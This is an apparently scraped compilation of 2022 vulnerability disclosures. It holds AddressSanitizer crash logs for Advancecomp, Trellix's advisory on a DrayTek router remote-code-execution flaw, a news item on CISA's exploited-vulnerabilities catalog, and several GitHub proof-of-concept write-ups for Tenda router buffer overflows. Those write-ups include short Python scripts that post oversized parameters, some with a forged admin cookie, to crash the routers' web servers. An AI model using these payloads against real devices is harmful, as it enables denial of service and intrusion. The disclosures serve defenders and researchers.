Advancecomp v2.3 was discovered to contain a heap buffer overflow.

    =================================================================
    ==95486==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6020000000f1 at pc 0x000000549906 bp 0x7ffc1e70ea10 sp 0x7ffc1e70ea08
    READ of size 16 at 0x6020000000f1 thread T0
        #0 0x549905 in mng_delta_addition /home/bupt/Desktop/advancecomp/lib/mng.c:406:13
        #1 0x5446c7 in mng_read_delta /home/bupt/Desktop/advancecomp/lib/mng.c:550:4
        #2 0x5446c7 in mng_read /home/bupt/Desktop/advancecomp/lib/mng.c:656:9
        #3 0x5418da in adv_mng_read /home/bupt/Desktop/advancecomp/lib/mng.c:748:9
        #4 0x5074e6 in convert_f_mng(adv_fz_struct*, adv_fz_struct*, unsigned int*, unsigned int*, adv_scroll_info_struct*, bool, bool) /home/bupt/Desktop/advancecomp/remng.cc:479:8
        #5 0x4fbd7d in convert_mng(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&) /home/bupt/Desktop/advancecomp/remng.cc:593:3
        #6 0x4fc3dd in convert_mng_inplace(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&) /home/bupt/Desktop/advancecomp/remng.cc:614:3
        #7 0x4ffc08 in remng_single(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, unsigned long long&, unsigned long long&) /home/bupt/Desktop/advancecomp/remng.cc:950:4
        #8 0x50b705 in remng_all(int, char**) /home/bupt/Desktop/advancecomp/remng.cc:985:3
        #9 0x5102d4 in process(int, char**) /home/bupt/Desktop/advancecomp/remng.cc:1249:3
        #10 0x511a98 in main /home/bupt/Desktop/advancecomp/remng.cc:1268:3
        #11 0x7f3b95b0ac86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310
        #12 0x41f289 in _start (/home/bupt/Desktop/advancecomp/advmng+0x41f289)
    
    0x6020000000f1 is located 0 bytes to the right of 1-byte region [0x6020000000f0,0x6020000000f1)
    allocated by thread T0 here:
        #0 0x4b1850 in malloc /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:145
        #1 0x54332a in mng_read_delta /home/bupt/Desktop/advancecomp/lib/mng.c:455:18
        #2 0x54332a in mng_read /home/bupt/Desktop/advancecomp/lib/mng.c:656:9
        #3 0x5418da in adv_mng_read /home/bupt/Desktop/advancecomp/lib/mng.c:748:9
        #4 0x4fbd7d in convert_mng(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&) /home/bupt/Desktop/advancecomp/remng.cc:593:3
        #5 0x4fc3dd in convert_mng_inplace(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&) /home/bupt/Desktop/advancecomp/remng.cc:614:3
        #6 0x4ffc08 in remng_single(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, unsigned long long&, unsigned long long&) /home/bupt/Desktop/advancecomp/remng.cc:950:4
        #7 0x50b705 in remng_all(int, char**) /home/bupt/Desktop/advancecomp/remng.cc:985:3
        #8 0x5102d4 in process(int, char**) /home/bupt/Desktop/advancecomp/remng.cc:1249:3
        #9 0x511a98 in main /home/bupt/Desktop/advancecomp/remng.cc:1268:3
        #10 0x7f3b95b0ac86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /home/bupt/Desktop/advancecomp/lib/mng.c:406:13 in mng_delta_addition
    Shadow bytes around the buggy address:
      0x0c047fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c047fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c047fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c047fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c047fff8000: fa fa fd fd fa fa fd fd fa fa fd fd fa fa 01 fa
    =>0x0c047fff8010: fa fa fd fa fa fa fd fa fa fa fd fd fa fa[01]fa
      0x0c047fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==95486==ABORTING
    

    SUMMARY: AddressSanitizer: heap-buffer-overflow /home/bupt/Desktop/advancecomp/lib/mng.c:406:13 in mng_delta_addition

CVE-2022-35017: Poc/CVE-2022-35017.md at main · Cvjark/Poc

Permalink

Cannot retrieve contributors at this time

**Product link**

https://github.com/amadvance/advancecomp

**POC file**

https://github.com/Cvjark/Poc/files/9060011/id1\_command\_advzip\_-x\_heap-buffer-overflow\_sample\_No.zip

**Command to reproduce**

./advzip -x [sample file]

**Product name & version**

last github commit code : a543d4c

**Problem Type**

Heap buffer overflow

**Crash Detail**

    ==96177==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61200000015c at pc 0x0000004b07b2 bp 0x7ffff13f3a60 sp 0x7ffff13f3210
    READ of size 256 at 0x61200000015c thread T0
        #0 0x4b07b1 in __asan_memcpy /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cpp:22
        #1 0x52acdb in data_dup(unsigned char const*, unsigned int) /home/bupt/Desktop/advancecomp/data.cc:39:4
        #2 0x51e5d9 in zip::open() /home/bupt/Desktop/advancecomp/zip.cc:888:21
        #3 0x504089 in extract_all(int, char**, bool) /home/bupt/Desktop/advancecomp/rezip.cc:301:4
        #4 0x508c3d in process(int, char**) /home/bupt/Desktop/advancecomp/rezip.cc:604:3
        #5 0x509b88 in main /home/bupt/Desktop/advancecomp/rezip.cc:623:3
        #6 0x7f7831f27c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310
        #7 0x41f1e9 in _start (/home/bupt/Desktop/advancecomp/advzip+0x41f1e9)
    
    0x61200000015c is located 0 bytes to the right of 284-byte region [0x612000000040,0x61200000015c)
    allocated by thread T0 here:
        #0 0x4b17b0 in malloc /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:145
        #1 0x52ada4 in data_alloc(unsigned int) /home/bupt/Desktop/advancecomp/data.cc:51:40
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cpp:22 in __asan_memcpy
    Shadow bytes around the buggy address:
      0x0c247fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c247fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c247fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c247fff8000: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
      0x0c247fff8010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x0c247fff8020: 00 00 00 00 00 00 00 00 00 00 00[04]fa fa fa fa
      0x0c247fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c247fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c247fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c247fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c247fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==96177==ABORTING
    

**Crash summary**

    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cpp:22 in __asan_memcpy

CVE-2022-35016: Poc/CVE-2022-35016.md at main · Cvjark/Poc

An issue was discovered on certain DrayTek Vigor routers before July 2022 such as the Vigor3910 before 4.3.1.1. /cgi-bin/wlogin.cgi has a buffer overflow via the username or password to the aa or ab field.

**Summary**

The Trellix Threat Labs Vulnerability Research team has found an unauthenticated remote code execution vulnerability, filed under CVE-2022-32548 affecting multiple DrayTek routers. The attack can be performed without user interaction if the management interface of the device has been configured to be internet facing. A one-click attack can also be performed from within the LAN in the default device configuration. The attack can lead to a full compromise of the device and may lead to a network breach and unauthorized access to internal resources. All the affected models have a patched firmware available for download on the vendor’s website.

**Introduction**

DrayTek is a Taiwanese company that manufactures Small Office and Home Office (SOHO) routers with a wide adoption in the UK, Vietnam, Taiwan, etc. (src: Shodan).

**Figure 1. Shodan search showing DrayTek devices used throughout the world**

With many businesses implementing work from home policies over the last two years, these affordable devices offer an easy way for Small and Medium Sized Businesses (SMBs) to provide VPN access to their employees. For this reason, we decided to look into the security of one of their flagship products, the Vigor 3910, and found a pre-authentication remote code execution vulnerability affecting the Vigor 3910 and 28 other DrayTek models sharing the same codebase (see Affected Devices below). Exploiting this vulnerability can lead to a complete compromise of the device and can enable a malicious actor to access internal resources of the breached networks.

During our research we uncovered over 200k devices which have the vulnerable service currently exposed on the internet and would require no user interaction to be exploited. Many more devices where the affected service is not exposed externally are still vulnerable to a one-click attack from the LAN. This vulnerability is tracked by MITRE as CVE-2022-32548 with a CVSS 3.0 score of 10.0. A patch has already been released by the manufacturer. If you or your organization are managing DrayTek devices, we recommend that you visit the manufacturer website and apply the patch as soon as possible.

We also applaud DrayTek for their great responsiveness and the release of a patch less than 30 days after we disclosed the vulnerability to their security team. This type of responsiveness and relationship shows true organization maturity and drive to improve security across the entire industry.

**Figure 2. A DrayTek Vigor 3910**

**Vulnerable devices**

The vulnerable devices are as follow:

Vigor3910 < 4.3.1.1  
Vigor1000B < 4.3.1.1  
Vigor2962 Series < 4.3.1.1  
Vigor2927 Series < 4.4.0  
Vigor2927 LTE Series < 4.4.0  
Vigor2915 Series < 4.3.3.2  
Vigor2952 / 2952P < 3.9.7.2  
Vigor3220 Series < 3.9.7.2  
Vigor2926 Series < 3.9.8.1  
Vigor2926 LTE Series < 3.9.8.1  
Vigor2862 Series < 3.9.8.1  
Vigor2862 LTE Series < 3.9.8.1  
Vigor2620 LTE Series < 3.9.8.1  
VigorLTE 200n < 3.9.8.1  
Vigor2133 Series < 3.9.6.4  
Vigor2762 Series < 3.9.6.4  
Vigor165 < 4.2.4  
Vigor166 < 4.2.4  
Vigor2135 Series < 4.4.2  
Vigor2765 Series < 4.4.2  
Vigor2766 Series < 4.4.2  
Vigor2832 < 3.9.6  
Vigor2865 Series < 4.4.0  
Vigor2865 LTE Series < 4.4.0  
Vigor2866 Series < 4.4.0  
Vigor2866 LTE Series < 4.4.0  

**Impact**

The compromise of a network appliance such as the Vigor 3910 can lead to the following outcomes (the following is a non-exhaustive list presented in no particular order):

*   Leak of the sensitive data stored on the router (keys, administrative passwords, etc.)
*   Access to the internal resources located on the LAN that would normally require VPN-access or be present “on the same network”
*   Man in the middle of the network traffic
*   Spying on DNS requests and other unencrypted traffic directed to the internet from the LAN through the router
*   Packet capture of the data going through any port of the router
*   Botnet activity (DDoS, hosting malicious data, etc.)
*   Leak of the sensitive data stored on the router (keys, administrative passwords, etc.)

Failed exploitation attempts can lead to:

*   Reboot of the device
*   Denial of Service of affected devices
*   Other possible abnormal behavior

Trellix Threat Labs is not currently aware of any signs of exploitation of this vulnerability in the wild; however, DrayTek devices were recently targeted by various known malicious actors. This was highlighted in the CISA’s memo on the People Republic of China (PRC) compromising SOHO routers and the report from Black Lotus Labs on the ZuoRAT exploiting the Vigor 3900 (end-of-life device replaced by the Vigor 3910). The nature of CVE-2022-32548 makes it harder to exploit compared to past vulnerabilities affecting DrayTek devices, which may hinder threat actors from quickly adopting this vulnerability into their attack frameworks.

**Demo video**

The following demo video highlights how an attacker could compromise a Draytek router and pivot to internal resources in a mock-network we’ve created.

**Technical details**

The web management interface of the vulnerable DrayTek devices is affected by a buffer overflow on the login page at **/cgi-bin/wlogin.cgi.** An attacker may supply carefully crafted username and/or password as base64 encoded strings inside the fields **aa** and **ab** of the login page. This would cause the buffer overflow to trigger due to a logic bug in the size verification of these encoded strings. By default, this attack is reachable on the LAN and may be reachable via the internet (WAN) as well if the user has enabled remote web management on their device. The consequence of this attack is a takeover of the so called “DrayOS” that implements the router functionalities. On devices that have an underlying Linux operating system (such as the Vigor 3910) it is then possible to pivot to the underlying operating system and establish a reliable foothold on the device and local network. Devices that are running the DrayOS as a bare-metal operating system will be harder to compromise as it requires that an attacker has better understanding of the DrayOS internals.

We will release more details as of how this bug was found and exploited in our upcoming talk at Hexacon on October 14-15, 2022 and the follow-up blog post that we will publish alongside the presentation.

**Detection**

Exploitation attempts can be detected by logging/alerting when a malformed base64 string is sent via a POST request to the **/cgi-bin/wlogin.cgi** end-point on the web management interface router. Base64 encoded strings are expected to be found in the **aa** and **ab** fields of the POST request. Malformed base64 strings indicative of an attack would have an abnormally high number of %3D padding. Any number over three should be considered suspicious.

The Trellix Network Security Platform has additionally released rules for exploitation attempts of this vulnerability under the identifier, _DrayTek CVE-2022-32548 Buffer Overflow Attempt._

**Recommendation**

We provide the following recommendations to those potentially affected by a vulnerable DrayTek router:

*   Make sure the latest firmware is deployed to your device. You can find the latest firmware by visiting the website of the manufacturer.
*   In the management interface of the device, verify that port mirroring, DNS settings, authorized VPN access and any other relevant settings have not been tampered with.
*   Do not expose the management interface to the Internet unless absolutely required. If you do, make sure you enable 2FA and IP restriction to minimize the risk of an attack.
*   Change the password of affected devices and revoke any secret stored on the router that may have been leaked.

**Conclusion**

Edge devices, such as the Vigor 3910 router, live on the boundary between internal and external networks. As such they are a prime target for cybercriminals and threat actors alike. Remotely breaching edge devices can lead to a full compromise of the businesses’ internal network. This is why it is critical to ensure these devices remain secure and updated and that vendors producing edge devices have processes in place for quick and efficient response following vulnerability disclosure, just as DrayTek did. Stay tuned for our next article on DrayTek routers where we will present the process used to uncover this vulnerability.

_This document and the information contained herein describes computer security research for educational purposes only and the convenience of Trellix customers. Trellix conducts research in accordance with its Vulnerability Reasonable Disclosure Policy | Trellix. Any attempt to recreate part or all of the activities described is solely at the user’s risk, and neither Trellix nor its affiliates will bear any responsibility or liability._

CVE-2022-32548: Unauthenticated Remote Code Execution in a Wide Range of DrayTek Vigor Routers

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Friday added 10 new actively exploited vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalog, including a high-severity security flaw affecting industrial automation software from Delta Electronics.
The issue, tracked as CVE-2021-38406 (CVSS score: 7.8), impacts DOPSoft 2 versions 2.00.07 and prior. A successful

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Friday added 10 new actively exploited vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalog, including a high-severity security flaw affecting industrial automation software from Delta Electronics.

The issue, tracked as CVE-2021-38406 (CVSS score: 7.8), impacts DOPSoft 2 versions 2.00.07 and prior. A successful exploitation of the flaw may lead to arbitrary code execution.

"Delta Electronics DOPSoft 2 lacks proper validation of user-supplied data when parsing specific project files (improper input validation) resulting in an out-of-bounds write that allows for code execution," CISA said in an alert.

It's worth noting that CVE-2021-38406 was originally disclosed as part of an industrial control systems (ICS) advisory published in September 2021.

However, there are no patches that address the vulnerability, with CISA noting that the "impacted product is end-of-life and should be disconnected if still in use." Federal Civilian Executive Branch (FCEB) agencies are mandated to follow the guideline by September 15, 2022.

Not much information is available about the nature of the attacks that exploit the security bug, but a recent report from Palo Alto Networks Unit 42 pointed out instances of in-the-wild attacks leveraging the flaw between February and April 2022.

The development adds weight to the notion that adversaries are getting faster at exploiting newly published vulnerabilities when they are first disclosed, leading to indiscriminate and opportunistic scanning attempts that aim to take advantage of delayed patching.

These attacks often follow a specific sequence for exploitation that involves web shells, crypto miners, botnets, and remote access trojans (RATs), followed by initial access brokers (IABs) that then pave the way for ransomware.

Among other actively exploited flaws added to the list are as follows -

*   **CVE-2022-26352** - dotCMS Unrestricted Upload of File Vulnerability
*   **CVE-2022-24706** - Apache CouchDB Insecure Default Initialization of Resource Vulnerability
*   **CVE-2022-24112** - Apache APISIX Authentication Bypass Vulnerability
*   **CVE-2022-22963** - VMware Tanzu Spring Cloud Function Remote Code Execution Vulnerability
*   **CVE-2022-2294** - WebRTC Heap Buffer Overflow Vulnerability
*   **CVE-2021-39226** - Grafana Authentication Bypass Vulnerability
*   **CVE-2020-36193** - PEAR Archive\_Tar Improper Link Resolution Vulnerability
*   **CVE-2020-28949** - PEAR Archive\_Tar Deserialization of Untrusted Data Vulnerability

**iOS and macOS flaw added to the list**

Another high-severity flaw added to the KEV Catalog is **CVE-2021-31010** (CVSS score: 7.5), a deserialization issue in Apple's Core Telephony component that could be leveraged to circumvent sandbox restrictions.

The tech giant addressed the shortcoming in iOS 12.5.5, iOS 14.8, iPadOS 14.8, macOS Big Sur 11.6 (and Security Update 2021-005 Catalina), and watchOS 7.6.2 released in September 2021.

While there were no indications that the flaw was being exploited at the time, the tech giant appears to have silently revised its advisories on May 25, 2022 to add the vulnerability and confirm that it had indeed been abused in attacks.

"Apple was aware of a report that this issue may have been actively exploited at the time of release," the tech giant noted, crediting Citizen Lab and Google Project Zero for the discovery.

The September update is also notable for remediating CVE-2021-30858 and CVE-2021-30860, both of which were employed by NSO Group, the makers of the Pegasus spyware, to get around the operating systems' security features.

This raises the possibility that CVE-2021-31010 may have been stringed together with the aforementioned two flaws in an attack chain to escape the sandbox and achieve arbitrary code execution.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

CISA Adds 10 New Known Actively Exploited Vulnerabilities to its Catalog

Tenda_TX9pro V22.03.02.10 was discovered to contain a buffer overflow via the component httpd/SetNetControlList.

Permalink

Cannot retrieve contributors at this time

**buffer overflow****Tenda\_TX9pro**

version: V22.03.02.10

**Description:**

There is a buffer overflow in httpd/SetNetControlList

**Source:**

you may download it from : http://www.totolink.cn/home/menu/detail.html?menu\_listtpl=download&id=2&ids=36

**Analyse:**

get value from list and send it to sub\_43157C

don't check the length of a1 and call strcpy

**POC**

    url = "http://192.168.1.13/goform/SetNetControlList"
    payload = 'A'*300 + '\n'
    
    r = requests.post(url, data={'list': payload})

CVE-2022-38510: CVE/SetNetControlList.md at main · whiter6666/CVE

Tenda M3 V1.0.0.12(4856) was discovered to contain a heap buffer overflow vulnerability in the function formEmailTest. This vulnerability allows attackers to cause a Denial of Service (DoS) via the mailpwd parameter.

**Tenda M3 contains heap buffer Overflow Vulnerability****overview**

*   type: heap buffer overflow vulnerability
*   supplier: Tenda https://www.tenda.com
*   product: TendaM3 https://www.tenda.com.cn/product/M3.html
*   firmware download: https://www.tenda.com.cn/download/detail-3133.html
*   affect version: TendaM3 v1.0.0.12(4856)

**Description****1\. Vulnerability Details**

the httpd in directory /bin has a heap buffer overflow. The vunlerability is in fucntion formEmailTest

It calls malloc(0x28Cu) to allocate heap buffer, and it copies POST parameter mailpwd to heap buffer.

v5 is the length of mailpwd, but it doesn’t limit it. so if v5>0x28C, the memcpy(v4, v20, v5) will cause heap buffer overflow

The progarm crashed when call malloc, the stack frame is below.

**2\. Recurring loopholes and POC**

use qemu-arm-static to run the httpd, we need to patch it before run.

*   in main function, The ConnectCfm function didn’t work properly, so I patched it to NOP
*   The R7WebsSecurityHandler function is used for permission control, and I've modified it to access URLs that can only be accessed after login

poc of DOS(deny of service)

import requests

data \= {
    "mailname": "@", 
    "mailpwd": "b"\*0x400
}
cookies \= {
    "user": "admin"
}
res \= requests.post("http://127.0.0.1/goform/testEmail", data\=data, cookies\=cookies)
print(res.content)

CVE-2022-38565: Vuln/Tenda M3/formEmailTest-mailpwd at main · xxy1126/Vuln

Tenda M3 V1.0.0.12(4856) was discovered to contain a buffer overflow vulnerability in the function formSetPicListItem. This vulnerability allows attackers to cause a Denial of Service (DoS) via the adItemUID parameter.

**Tenda M3 contains Buffer Overflow Vulnerability****overview**

*   type: buffer overflow vulnerability
    
*   supplier: Tenda https://www.tenda.com
    
*   product: TendaM3 https://www.tenda.com.cn/product/M3.html
    
*   firmware download: https://www.tenda.com.cn/download/detail-3133.html
    
*   affect version: TendaM3 v1.0.0.12(4856)
    

**Description****1\. Vulnerability Details**

the httpd in directory /bin has a buffer overflow. The vunlerability is in fucntion formSetPicListItem

In this function, it copies POST parameter adItemUID to buffer in .bss

If v21 is too long, it will causes dos(deny of service)

**2\. Recurring loopholes and POC**

use qemu-arm-static to run the httpd, we need to patch it before run.

*   in main function, The ConnectCfm function didn’t work properly, so I patched it to NOP
*   The R7WebsSecurityHandler function is used for permission control, and I've modified it to access URLs that can only be accessed after login

poc of DOS(deny of service)

import requests

data \= {
    "adItemUID": "a"\*0x2000
}
cookies \= {
    "user": "admin"
}
res \= requests.post("http://127.0.0.1/goform/setPicListItem", data\=data, cookies\=cookies)
print(res.content)

CVE-2022-38564: Vuln/Tenda M3/formSetPicListItem at main · xxy1126/Vuln

Tenda M3 V1.0.0.12(4856) was discovered to contain a heap buffer overflow vulnerability in the function formSetFixTools. This vulnerability allows attackers to cause a Denial of Service (DoS) via the hostname parameter.

**Tenda M3 contains heap Overflow Vulnerability****overview**

*   type: heap overflow vulnerability
    
*   supplier: Tenda https://www.tenda.com
    
*   product: TendaM3 https://www.tenda.com.cn/product/M3.html
    
*   firmware download: https://www.tenda.com.cn/download/detail-3133.html
    
*   affect version: TendaM3 v1.0.0.12(4856)
    

**Description****1\. Vulnerability Details**

the httpd in directory /bin has a heap buffer overflow. The vunlerability is in fucntion formSetFixTools

It calls malloc(0x28Cu) to allocate heap buffer, and it copies POST parameterhostname tp heap buffer.

If v3 > 0x50, that will cause heap overflow due to strncpy(v1, v2, c3)

**2\. Recurring loopholes and POC**

use qemu-arm-static to run the httpd, we need to patch it before run.

*   in main function, The ConnectCfm function didn’t work properly, so I patched it to NOP
*   The R7WebsSecurityHandler function is used for permission control, and I've modified it to access URLs that can only be accessed after login

poc of DOS(deny of service)

import requests

data \= {
    "networkTool": "1", 
	"hostName": "a"\*0x100
}
cookies \= {
    "user": "admin"
}
res \= requests.post("http://127.0.0.1/goform/setFixTools", data\=data, cookies\=cookies)
print(res.content)

CVE-2022-38568: Vuln/Tenda M3/formSetFixTools_hostname at main · xxy1126/Vuln

Tenda M3 V1.0.0.12(4856) was discovered to contain a stack overflow vulnerability in the function formSetAdConfigInfo. This vulnerability allows attackers to cause a Denial of Service (DoS) via the authIPs parameter.

**Tenda M3 contains Stack Overflow Vulnerability****overview**

*   type: stack overflow vulnerability
    
*   supplier: Tenda https://www.tenda.com
    
*   product: TendaM3 https://www.tenda.com.cn/product/M3.html
    
*   firmware download: https://www.tenda.com.cn/download/detail-3133.html
    
*   affect version: TendaM3 v1.0.0.12(4856)
    

**Description****1\. Vulnerability Details**

the httpd in directory /bin has a stack buffer overflow. The vunlerability is in fucntion formSetAdConfigInfo

In this function, is copies POST parameter authIPs to stack buffer without checking its length, causing a stack buffer overflow vulnerability.

**2\. Recurring loopholes and POC**

use qemu-arm-static to run the httpd, we need to patch it before run.

*   in main function, The ConnectCfm function didn’t work properly, so I patched it to NOP
*   The R7WebsSecurityHandler function is used for permission control, and I've modified it to access URLs that can only be accessed after login

poc of DOS(deny of service)

import requests

data \= {
    "authIPs": "a"\*0x1000
}
cookies \= {
    "user": "admin"
}
res \= requests.post("http://127.0.0.1/goform/setAdConfigInfo", data\=data, cookies\=cookies)
print(res.content)

CVE-2022-38567: Vuln/Tenda M3/formSetAdConfigInfo_ at main · xxy1126/Vuln

Tenda M3 V1.0.0.12(4856) was discovered to contain a heap buffer overflow vulnerability in the function formEmailTest. This vulnerability allows attackers to cause a Denial of Service (DoS) via the mailname parameter.

**Tenda M3 contains heap buffer Overflow Vulnerability****overview**

*   type: heap buffer overflow vulnerability
    
*   supplier: Tenda https://www.tenda.com
    
*   product: TendaM3 https://www.tenda.com.cn/product/M3.html
    
*   firmware download: https://www.tenda.com.cn/download/detail-3133.html
    
*   affect version: TendaM3 v1.0.0.12(4856)
    

**Description****1\. Vulnerability Details**

the httpd in directory /bin has a heap buffer overflow. The vunlerability is in fucntion formEmailTest

It calls malloc(0x28Cu) to allocate heap buffer, and it copies POST parameter mailname to heap buffer.

v3 is the length of mailname, but it doesn’t limit it. so if v3>0x28C, the memcpy(v1, v2, v3) will cause heap buffer overflow

but it can cause segmentation fault when execute memcpy(v1, v2, v3)

**2\. Recurring loopholes and POC**

use qemu-arm-static to run the httpd, we need to patch it before run.

*   in main function, The ConnectCfm function didn’t work properly, so I patched it to NOP
*   The R7WebsSecurityHandler function is used for permission control, and I've modified it to access URLs that can only be accessed after login

poc of DOS(deny of service)

import requests

data \= {
    "mailname": "@"+"a"\*0x600, 
    "mailpwd": "a"
}
cookies \= {
    "user": "admin"
}
res \= requests.post("http://127.0.0.1/goform/testEmail", data\=data, cookies\=cookies)
print(res.content)

we can see the size of dest is 0x291 and size of src is 0x600

Tag

#buffer_overflow